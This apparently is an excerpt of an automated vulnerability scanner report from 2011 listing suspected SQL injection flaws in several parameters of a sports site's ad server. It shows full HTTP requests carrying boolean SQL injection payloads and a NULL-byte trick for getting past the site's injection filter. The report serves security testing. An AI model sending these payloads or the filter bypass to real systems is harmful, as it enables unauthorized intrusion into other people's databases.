GET /mac-ad?META&ADSEPARATOR=%3B&GLOBAL&REQID=1&CLIENT:ID=SJS&CELT=jph&PAGESTATE=&SITE=175&BRAND=59&NCAT=22058%3A22207%3A&NODE=22207&PTYPE=2001&PGUID=TbiQ3wq0GVcAACnZCmE&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_EXCLUDE=golf&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=35742613&ADREQ&SP=234&POS=100&WIDTH=970&HEIGHT=0&cookiesOn=1&divId=cbsiad234_100&ADREQ&SP=110&POS=100&cookiesOn=1&divId=cbsiad110_100&ADREQ&SP=1613363790'%20or%201%3d1--%20&POS=100&WIDTH=300&HEIGHT=260&cookiesOn=1&divId=cbsiad16_100&ADREQ&SP=119&POS=100&cookiesOn=1&divId=cbsiad119_100 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/golf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response 1

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:04:35 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:04:35 GMT
Content-Length: 15047

/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbsiad234_100",segmentId:"504465",rotatorId:"15989",creativeSizeId:"207",isBlank:"0",seg_pageState:"2312;BC2312-51",adHTML:"<div id=\"madison_ad_2
...[SNIP]...
log.com.com/adlog/c/r=15989&sg=504465&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22207&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e1:4DB88263C2B0&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173%2e193%2e214%2e243&pg=TbiQ3wq0GVcAACnZCmE&t=2011.04.27.22.04.35/http://clk.atdmt.com/COM/go/305845692/direct;pc.504465/01/2011.04.27.22.04.35\" target=\"_blank\"><img src=\"http://adlog.com.com/adlog/i/r=15989&sg=504465&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22207&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e1:4DB88263C2B0&orh=cbssports.com&ort=&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173%2e193%2e214%2e243&dvar=dvar%255fexclude%253dgolf%2523dvar%255finstlang%253den%252dUS%2523dvar%255fsession%253dc%2523dvar%255fsubsession%253d4%2523dvar%255fuser%253danon&ucat_rsi=%2526&pg=TbiQ3wq0GVcAACnZCmE&t=2011.04.27.22.04.35/http://i.i.com.com/cnwk.1d/Ads/2312/10/SWA_0_Redtape_970x66_jpg.jpg\" height=\"66\" width=\"970\" alt=\"Click Here\" border=\"0\" /></a><img src=\"http://view.atdmt.com/COM/view/305845692/direct;pc.504465/01/2011.04.27.22.04.35\" width=\"0\" height=\"0\" border=\"0\" alt=\"\" style=\"position:absolute; top:0px; left:0px\" /></center></div></div>"})/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw6.cnet.com::1493002560 2011.04.27.22.04.35 *//* MAC T 0.1.4.5 */;/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbsiad110_100",segmentId:"503380",rotatorId:"18229",creativeSizeId:"79",isBlank:"0",seg_pageState:"",adHTML:"<style type=\"text/css\"> @import \"http://i.i.com.com/cnwk.1d/Ads/common/css/SportsSkyOne/SportsSkyOne.css\";</style>\n<ul class=\"adsSportsSkyOne\">\n <li id=\"item_1_503380\" style=\"display:block;\">\n <a class=\"adsSportsSkyOne_img\" href=\"http://adlog.com.com/adlog/c/r=18229&sg=503380&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22207&pid=&cid=&am
...[SNIP]...

Request 2

GET /mac-ad?META&ADSEPARATOR=%3B&GLOBAL&REQID=1&CLIENT:ID=SJS&CELT=jph&PAGESTATE=&SITE=175&BRAND=59&NCAT=22058%3A22207%3A&NODE=22207&PTYPE=2001&PGUID=TbiQ3wq0GVcAACnZCmE&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_EXCLUDE=golf&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=35742613&ADREQ&SP=234&POS=100&WIDTH=970&HEIGHT=0&cookiesOn=1&divId=cbsiad234_100&ADREQ&SP=110&POS=100&cookiesOn=1&divId=cbsiad110_100&ADREQ&SP=1613363790'%20or%201%3d2--%20&POS=100&WIDTH=300&HEIGHT=260&cookiesOn=1&divId=cbsiad16_100&ADREQ&SP=119&POS=100&cookiesOn=1&divId=cbsiad119_100 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/golf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response 2

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:04:35 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:04:35 GMT
Content-Length: 15057

/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbsiad234_100",segmentId:"504465",rotatorId:"15989",creativeSizeId:"207",isBlank:"0",seg_pageState:"2312;BC2312-51",adHTML:"<div id=\"madison_ad_2
...[SNIP]...
log.com.com/adlog/c/r=15989&sg=504465&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22207&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e23:4DB692D21263EE&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173%2e193%2e214%2e243&pg=TbiQ3wq0GVcAACnZCmE&t=2011.04.27.22.04.35/http://clk.atdmt.com/COM/go/305845692/direct;pc.504465/01/2011.04.27.22.04.35\" target=\"_blank\"><img src=\"http://adlog.com.com/adlog/i/r=15989&sg=504465&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22207&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e23:4DB692D21263EE&orh=cbssports.com&ort=&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173%2e193%2e214%2e243&dvar=dvar%255fexclude%253dgolf%2523dvar%255finstlang%253den%252dUS%2523dvar%255fsession%253dc%2523dvar%255fsubsession%253d4%2523dvar%255fuser%253danon&ucat_rsi=%2526&pg=TbiQ3wq0GVcAACnZCmE&t=2011.04.27.22.04.35/http://i.i.com.com/cnwk.1d/Ads/2312/10/SWA_0_Redtape_970x66_jpg.jpg\" height=\"66\" width=\"970\" alt=\"Click Here\" border=\"0\" /></a><img src=\"http://view.atdmt.com/COM/view/305845692/direct;pc.504465/01/2011.04.27.22.04.35\" width=\"0\" height=\"0\" border=\"0\" alt=\"\" style=\"position:absolute; top:0px; left:0px\" /></center></div></div>"})/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw2.cnet.com::1544677696 2011.04.27.22.04.35 *//* MAC T 0.1.4.5 */;/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbsiad110_100",segmentId:"503380",rotatorId:"18229",creativeSizeId:"79",isBlank:"0",seg_pageState:"",adHTML:"<style type=\"text/css\"> @import \"http://i.i.com.com/cnwk.1d/Ads/common/css/SportsSkyOne/SportsSkyOne.css\";</style>\n<ul class=\"adsSportsSkyOne\">\n <li id=\"item_1_503380\" style=\"display:block;\">\n <a class=\"adsSportsSkyOne_img\" href=\"http://adlog.com.com/adlog/c/r=18229&sg=503380&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22207&pid=&c
...[SNIP]...

1.11. http://mads.cbssports.com/mac-ad [ADREQ&SP parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The ADREQ&SP parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ADREQ&SP parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /mac-ad?META&ADSEPARATOR=%3B&GLOBAL&REQID=1&CLIENT:ID=SJS&CELT=jph&PAGESTATE=&SITE=175&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=96082330&ADREQ&SP=234&POS=100&WIDTH=970&HEIGHT=0&cookiesOn=1&divId=cbsiad234_100&ADREQ&SP=110&POS=100&cookiesOn=1&divId=cbsiad110_100&ADREQ&SP=16%00'&POS=100&WIDTH=300&HEIGHT=260&cookiesOn=1&divId=cbsiad16_100&ADREQ&SP=119&POS=100&cookiesOn=1&divId=cbsiad119_100 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response 1

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:10:50 GMT
Server: Apache/2.2
Content-Length: 6540
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:10:50 GMT

/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbsiad234_100",segmentId:"1815",rotatorId:"18684",creativeSizeId:"4",isBlank:"1",seg_pageState:"",adHTML:"<img src=\"http://adl
...[SNIP]...
<a href=\"http://www.eyewonderlabs.com/ct2.cfm?ewbust=0&guid=0&ewadid=125884&eid=1455503&file=http://cdn.eyewonder.com/100125/769267/1455503/NOSCRIPTfailover.gif&pnl=MainBanner&type=0&name=Clickthru-NOSCRIPT&num=1&time=0&diff=0&clkX=&clkY=&click=http://ad.doubleclick.net/clk;238359628;61638243;s;pc=cbs504357\" target=\"_blank\">
...[SNIP]...

Request 2

GET /mac-ad?META&ADSEPARATOR=%3B&GLOBAL&REQID=1&CLIENT:ID=SJS&CELT=jph&PAGESTATE=&SITE=175&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=96082330&ADREQ&SP=234&POS=100&WIDTH=970&HEIGHT=0&cookiesOn=1&divId=cbsiad234_100&ADREQ&SP=110&POS=100&cookiesOn=1&divId=cbsiad110_100&ADREQ&SP=16%00''&POS=100&WIDTH=300&HEIGHT=260&cookiesOn=1&divId=cbsiad16_100&ADREQ&SP=119&POS=100&cookiesOn=1&divId=cbsiad119_100 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response 2

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:10:52 GMT
Server: Apache/2.2
Content-Length: 5506
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:10:52 GMT

/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbsiad234_100",segmentId:"1815",rotatorId:"18684",creativeSizeId:"4",isBlank:"1",seg_pageState:"",adHTML:"<img src=\"http://adl
...[SNIP]...

1.12. http://mads.cbssports.com/mac-ad [DVAR_SUBSESSION parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The DVAR_SUBSESSION parameter appears to be vulnerable to SQL injection attacks. The payloads 10971543'%20or%201%3d1--%20 and 10971543'%20or%201%3d2--%20 were each submitted in the DVAR_SUBSESSION parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mac-ad?META&ADSEPARATOR=%3B&GLOBAL&REQID=1&CLIENT:ID=SJS&CELT=jph&PAGESTATE=&SITE=175&BRAND=59&NCAT=22058%3A22207%3A&NODE=22207&PTYPE=2001&PGUID=TbiQ3wq0GVcAACnZCmE&DVAR_SESSION=c&DVAR_SUBSESSION=410971543'%20or%201%3d1--%20&cookiesOn=1&DVAR_EXCLUDE=golf&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=35742613&ADREQ&SP=234&POS=100&WIDTH=970&HEIGHT=0&cookiesOn=1&divId=cbsiad234_100&ADREQ&SP=110&POS=100&cookiesOn=1&divId=cbsiad110_100&ADREQ&SP=16&POS=100&WIDTH=300&HEIGHT=260&cookiesOn=1&divId=cbsiad16_100&ADREQ&SP=119&POS=100&cookiesOn=1&divId=cbsiad119_100 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/golf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response 1

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:02:05 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:02:05 GMT
Content-Length: 17183

/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbsiad234_100",segmentId:"504465",rotatorId:"15989",creativeSizeId:"207",isBlank:"0",seg_pageState:"2312;BC2312-51",adHTML:"<div id=\"madison_ad_2
...[SNIP]...
log.com.com/adlog/c/r=15989&sg=504465&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22207&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e26:4DB62DED153CD6&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173%2e193%2e214%2e243&pg=TbiQ3wq0GVcAACnZCmE&t=2011.04.27.22.02.05/http://clk.atdmt.com/COM/go/305845692/direct;pc.504465/01/2011.04.27.22.02.05\" target=\"_blank\"><img src=\"http://adlog.com.com/adlog/i/r=15989&sg=504465&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22207&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e26:4DB62DED153CD6&orh=cbssports.com&ort=&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173%2e193%2e214%2e243&dvar=dvar%255fexclude%253dgolf%2523dvar%255finstlang%253den%252dUS%2523dvar%255fsession%253dc%2523dvar%255fsubsession%253d410971543%2520or%25201%253d1%252d%252d%2520%2523dvar%255fuser%253danon&ucat_rsi=%2526&pg=TbiQ3wq0GVcAACnZCmE&t=2011.04.27.22.02.05/http://i.i.com.com/cnwk.1d/Ads/2312/10/SWA_0_Redtape_970x66_jpg.jpg\" height=\"66\" width=\"970\" alt=\"Click Here\" border=\"0\" /></a><img src=\"http://view.atdmt.com/COM/view/305845692/direct;pc.504465/01/2011.04.27.22.02.05\" width=\"0\" height=\"0\" border=\"0\" alt=\"\" style=\"position:absolute; top:0px; left:0px\" /></center></div></div>"})/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw8.cnet.com::1767131456 2011.04.27.22.02.05 *//* MAC T 0.1.4.a */;/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbsiad110_100",segmentId:"503380",rotatorId:"18229",creativeSizeId:"79",isBlank:"0",seg_pageState:"",adHTML:"<style type=\"text/css\"> @import \"http://i.i.com.com/cnwk.1d/Ads/common/css/SportsSkyOne/SportsSkyOne.css\";</style>\n<ul class=\"adsSportsSkyOne\">\n <li id=\"item_1_503380\" style=\"display:block;\">\n <a class=\"adsSportsSkyOne_img\" href=\"http://adlog.com.com/adlog/c/r=18229&sg=503380&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=1
...[SNIP]...

Request 2

GET /mac-ad?META&ADSEPARATOR=%3B&GLOBAL&REQID=1&CLIENT:ID=SJS&CELT=jph&PAGESTATE=&SITE=175&BRAND=59&NCAT=22058%3A22207%3A&NODE=22207&PTYPE=2001&PGUID=TbiQ3wq0GVcAACnZCmE&DVAR_SESSION=c&DVAR_SUBSESSION=410971543'%20or%201%3d2--%20&cookiesOn=1&DVAR_EXCLUDE=golf&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=35742613&ADREQ&SP=234&POS=100&WIDTH=970&HEIGHT=0&cookiesOn=1&divId=cbsiad234_100&ADREQ&SP=110&POS=100&cookiesOn=1&divId=cbsiad110_100&ADREQ&SP=16&POS=100&WIDTH=300&HEIGHT=260&cookiesOn=1&divId=cbsiad16_100&ADREQ&SP=119&POS=100&cookiesOn=1&divId=cbsiad119_100 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/golf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response 2

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:02:06 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:02:06 GMT
Content-Length: 17172

/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbsiad234_100",segmentId:"504465",rotatorId:"15989",creativeSizeId:"207",isBlank:"0",seg_pageState:"2312;BC2312-51",adHTML:"<div id=\"madison_ad_2
...[SNIP]...
log.com.com/adlog/c/r=15989&sg=504465&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22207&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e6:4DB87BE0113DC&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173%2e193%2e214%2e243&pg=TbiQ3wq0GVcAACnZCmE&t=2011.04.27.22.02.06/http://clk.atdmt.com/COM/go/305845692/direct;pc.504465/01/2011.04.27.22.02.06\" target=\"_blank\"><img src=\"http://adlog.com.com/adlog/i/r=15989&sg=504465&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22207&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e6:4DB87BE0113DC&orh=cbssports.com&ort=&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173%2e193%2e214%2e243&dvar=dvar%255fexclude%253dgolf%2523dvar%255finstlang%253den%252dUS%2523dvar%255fsession%253dc%2523dvar%255fsubsession%253d410971543%2520or%25201%253d2%252d%252d%2520%2523dvar%255fuser%253danon&ucat_rsi=%2526&pg=TbiQ3wq0GVcAACnZCmE&t=2011.04.27.22.02.06/http://i.i.com.com/cnwk.1d/Ads/2312/10/SWA_0_Redtape_970x66_jpg.jpg\" height=\"66\" width=\"970\" alt=\"Click Here\" border=\"0\" /></a><img src=\"http://view.atdmt.com/COM/view/305845692/direct;pc.504465/01/2011.04.27.22.02.06\" width=\"0\" height=\"0\" border=\"0\" alt=\"\" style=\"position:absolute; top:0px; left:0px\" /></center></div></div>"})/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw20.cnet.com::1684199744 2011.04.27.22.02.06 *//* MAC T 0.0.3.4 */;/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbsiad110_100",segmentId:"503380",rotatorId:"18229",creativeSizeId:"79",isBlank:"0",seg_pageState:"",adHTML:"<style type=\"text/css\"> @import \"http://i.i.com.com/cnwk.1d/Ads/common/css/SportsSkyOne/SportsSkyOne.css\";</style>\n<ul class=\"adsSportsSkyOne\">\n <li id=\"item_1_503380\" style=\"display:block;\">\n <a class=\"adsSportsSkyOne_img\" href=\"http://adlog.com.com/adlog/c/r=18229&sg=503380&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=175&
...[SNIP]...

1.13. http://mads.cbssports.com/mac-ad [POS parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The POS parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the POS parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mac-ad?META&ADSEPARATOR=%3B&GLOBAL&REQID=1&CLIENT:ID=SJS&CELT=jph&PAGESTATE=&SITE=175&BRAND=59&NCAT=22058%3A22207%3A&NODE=22207&PTYPE=2001&PGUID=TbiQ3wq0GVcAACnZCmE&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_EXCLUDE=golf&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=35742613&ADREQ&SP=234&POS=100&WIDTH=970&HEIGHT=0&cookiesOn=1&divId=cbsiad234_100&ADREQ&SP=110&POS=100&cookiesOn=1&divId=cbsiad110_100&ADREQ&SP=16&POS=100%20and%201%3d1--%20&WIDTH=300&HEIGHT=260&cookiesOn=1&divId=cbsiad16_100&ADREQ&SP=119&POS=100&cookiesOn=1&divId=cbsiad119_100 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/golf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response 1

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:04:40 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:04:40 GMT
Content-Length: 15034

/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbsiad234_100",segmentId:"504465",rotatorId:"15989",creativeSizeId:"207",isBlank:"0",seg_pageState:"2312;BC2312-51",adHTML:"<div id=\"madison_ad_2
...[SNIP]...
og.com.com/adlog/c/r=15989&sg=504465&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22207&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e13:4DB85B782A447&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173%2e193%2e214%2e243&pg=TbiQ3wq0GVcAACnZCmE&t=2011.04.27.22.04.40/http://clk.atdmt.com/COM/go/305845692/direct;pc.504465/01/2011.04.27.22.04.40\" target=\"_blank\"><img src=\"http://adlog.com.com/adlog/i/r=15989&sg=504465&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22207&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e13:4DB85B782A447&orh=cbssports.com&ort=&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173%2e193%2e214%2e243&dvar=dvar%255fexclude%253dgolf%2523dvar%255finstlang%253den%252dUS%2523dvar%255fsession%253dc%2523dvar%255fsubsession%253d4%2523dvar%255fuser%253danon&ucat_rsi=%2526&pg=TbiQ3wq0GVcAACnZCmE&t=2011.04.27.22.04.40/http://i.i.com.com/cnwk.1d/Ads/2312/10/SWA_0_Redtape_970x66_jpg.jpg\" height=\"66\" width=\"970\" alt=\"Click Here\" border=\"0\" /></a><img src=\"http://view.atdmt.com/COM/view/305845692/direct;pc.504465/01/2011.04.27.22.04.40\" width=\"0\" height=\"0\" border=\"0\" alt=\"\" style=\"position:absolute; top:0px; left:0px\" /></center></div></div>"})/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw19.cnet.com::1375332672 2011.04.27.22.04.40 *//* MAC T 0.1.4.5 */;/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbsiad110_100",segmentId:"503380",rotatorId:"18229",creativeSizeId:"79",isBlank:"0",seg_pageState:"",adHTML:"<style type=\"text/css\"> @import \"http://i.i.com.com/cnwk.1d/Ads/common/css/SportsSkyOne/SportsSkyOne.css\";</style>\n<ul class=\"adsSportsSkyOne\">\n <li id=\"item_1_503380\" style=\"display:block;\">\n <a class=\"adsSportsSkyOne_img\" href=\"http://adlog.com.com/adlog/c/r=18229&sg=503380&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22207&pid=&cid
...[SNIP]...

Request 2

GET /mac-ad?META&ADSEPARATOR=%3B&GLOBAL&REQID=1&CLIENT:ID=SJS&CELT=jph&PAGESTATE=&SITE=175&BRAND=59&NCAT=22058%3A22207%3A&NODE=22207&PTYPE=2001&PGUID=TbiQ3wq0GVcAACnZCmE&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_EXCLUDE=golf&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=35742613&ADREQ&SP=234&POS=100&WIDTH=970&HEIGHT=0&cookiesOn=1&divId=cbsiad234_100&ADREQ&SP=110&POS=100&cookiesOn=1&divId=cbsiad110_100&ADREQ&SP=16&POS=100%20and%201%3d2--%20&WIDTH=300&HEIGHT=260&cookiesOn=1&divId=cbsiad16_100&ADREQ&SP=119&POS=100&cookiesOn=1&divId=cbsiad119_100 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/golf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response 2

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:04:41 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:04:41 GMT
Content-Length: 15024

